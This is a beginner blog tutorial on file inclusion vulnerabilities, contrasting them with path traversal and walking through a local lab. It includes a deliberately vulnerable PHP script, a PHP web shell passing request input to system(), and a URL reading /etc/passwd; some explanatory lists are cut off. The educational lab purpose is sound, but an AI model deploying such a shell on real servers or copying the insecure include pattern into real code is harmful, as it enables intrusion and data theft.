This is a summary of the article in my blog: https://stackzero.net/file-inclusion-introduction/
In this article, we will be exploring the ins and outs of file inclusion vulnerability exploitation. We will cover what file inclusion vulnerabilities are, how they work, and how hackers can exploit it.
I’m going to try to make this introduction to file inclusion vulnerability as beginner-friendly as possible. So you probably won’t need a deep prior knowledge of the treated arguments. You should be able to follow along and learn something it doesn’t matter what your starting point is.
By the end of this article, I guess, you will have a solid understanding of file inclusion vulnerabilities.
So let’s get started!
A file inclusion vulnerability is a security flaw that allows an attacker to access/execute arbitrary files on a target system.
We can often find this type of vulnerability in web applications that dynamically include files based on user input.
The lack of appropriate checks could allow the attacker to gain unauthorized access to sensitive data.
File inclusion vulnerabilities can be difficult to detect and protect against, making them a common target for hackers.
Now that we have seen the definition, let’s go a bit deeper and see how it works.
File inclusion works by allowing an application to dynamically include and execute files based on user input. But just to stress more the concept, try to imagine this example:
We consider a hypothetical application that:
However, if the application does not properly validate the file type or the location of the file, an attacker could:
There are two main types of file inclusion vulnerabilities: local file inclusion (LFI) and remote file inclusion (RFI).
In other words:
The difference between directory path traversal and file inclusion is not so clear so, in this introduction, I want to go a bit deeper!
By looking at the web, I noticed that those two vulnerabilities cause a bit of confusion, so I’ll try to explain them at my best!
Path traversal and file inclusion are similar in that they both involve manipulating the file system of a target system. However, they differ in the specific ways that they are exploited and the types of vulnerabilities that they target.
Overall, while both path traversal and file inclusion involve manipulating the file system of a target system, they target different types of vulnerabilities and their exploitation is pretty different.
Summing up, Directory Path Traversal vulnerabilities allow an attacker to access files and directories that are outside of the intended directory structure, while File Inclusion vulnerabilities allow an attacker to include and execute arbitrary files on a target system.
So the main difference is that File Inclusion, as the name says, includes a file and then executes it.
Even if it’s just an introduction to file inclusion vulnerability, I want to show you a practical example of LFI.
Obviously, I’ll try to keep the technical part as little as possible.
First of all, to exploit this vulnerability we want our malicious payload inside the target server. So in order to simulate a real case, I want to couple this vulnerability with the already seen “ Unrestricted File Upload “
Here is an example of an application that has these vulnerabilities:
If you want to run it on your machine, you should have an HTTP server which supports PHP ( XAMPP can be a valid alternative). In this tutorial, I assume you are working on your Kali Machine, so you just need to install PHP by typing this in your terminal and then use the built-in server:
sudo apt install php libapache2-mod-php
Now you can create a file called “index.php” and write this code inside:
<?php
// include the file passed as GET parameter
if (isset($_GET['file'])) {
include($_GET['file']);
}// upload the file
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
</head>
<body>
<div class="container">
<div class="row">
<div class="col-md-6">
<form action="" method="POST" enctype="multipart/form-data">
<div class="form-group">
<label for="file">Upload file</label>
<input type="file" class="form-control" name="file" id="file">
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
</div>
</div>
</div>
</body>
</html>
This is a PHP script that:
GET
parameter named file
is setfile
parameter is set in the $_GET
superglobal arrayPOST
request by checking if the file
element is set in the $_FILES
superglobal arrayuploads/
directory and give it the original name of the uploaded file.The form uses the POST
method and has the enctype
attribute set to "multipart/form-data"
to allow file uploads. On form submission, the server executes the file we sent.
It’s easy, but before proceeding let’s create a directory called “uploads” by typing on the terminal:
mkdir uploads
Now we can execute our simple PHP server with the command:
php -S 0.0.0.0:8000 -t .
Finally, this is the result in our browser by typing http://<TARGET_IP>:8000
Now you can look for a backdoor or maybe create it by yourself, I’m going to use the one at this address, and this is the code:
<?phpif(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>
So let’s upload it with the form, and after that, it’s inside the “uploads” folder, so we can execute cat or whatever we want by typing an URL like this:
http://192.168.1.110:8000/?file=uploads/payload.php&cmd=cat%20/etc/passwd
In this case, it will prompt the content of /etc/passwd.
It would be pretty easy to understand how to take advantage of that to take down the system totally.
In conclusion, file inclusion vulnerabilities are a serious threat to the security of web applications. These vulnerabilities allow attackers to include and execute arbitrary files on a target system, potentially gaining unauthorized access to sensitive data or compromising the system in other ways. As we have seen in the examples above, file inclusion vulnerabilities can be difficult to detect and protect against, making them a common target for hackers. Therefore, it is essential for organizations to take steps to secure their systems against file inclusion vulnerabilities and regularly monitor for potential attacks. By doing so, they can safeguard their systems and prevent costly and damaging breaches.
I hope you liked this introduction to file inclusion. If you find useful my work, please keep taking a look at my blog (maybe add it to your favourites) and follow all my social profiles!
Follow me on medium to receive my new articles. And if you want to subscribe to Medium, consider to use my referral link, it’s not an additional cost for you but would be a big help for me.
Originally published at https://stackzero.net on December 15, 2022.